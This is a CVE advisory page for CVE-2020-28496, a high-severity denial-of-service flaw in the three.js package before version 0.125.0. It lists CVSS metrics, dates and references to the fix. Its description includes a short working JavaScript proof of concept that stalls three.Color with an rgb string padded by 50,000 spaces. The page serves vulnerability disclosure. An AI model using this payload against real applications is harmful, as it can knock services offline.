← Back to CVEs
CVE-2020-28496
HIGH7.5
Description
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
CVE Details
CVSS v3.1 Score7.5
SeverityHIGH
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Attack VectorNETWORK
ComplexityLOW
Privileges RequiredNONE
User InteractionNONE
Published2/18/2021
Last Modified11/21/2024
Sourcenvd
Honeypot Sightings0
Affected Products
three_project:three
Weaknesses (CWE)
CWE-400
References
https://github.com/mrdoob/three.js/issues/21132(report@snyk.io)
https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e(report@snyk.io)
https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972(report@snyk.io)
https://snyk.io/vuln/SNYK-JS-THREE-1064931(report@snyk.io)
https://github.com/mrdoob/three.js/issues/21132(af854a3a-2127-422b-91ae-364da2661108)
https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e(af854a3a-2127-422b-91ae-364da2661108)
https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1065972(af854a3a-2127-422b-91ae-364da2661108)
https://snyk.io/vuln/SNYK-JS-THREE-1064931(af854a3a-2127-422b-91ae-364da2661108)
IOC Correlations
No correlations recorded
This product uses data from the NVD API but is not endorsed or certified by the NVD.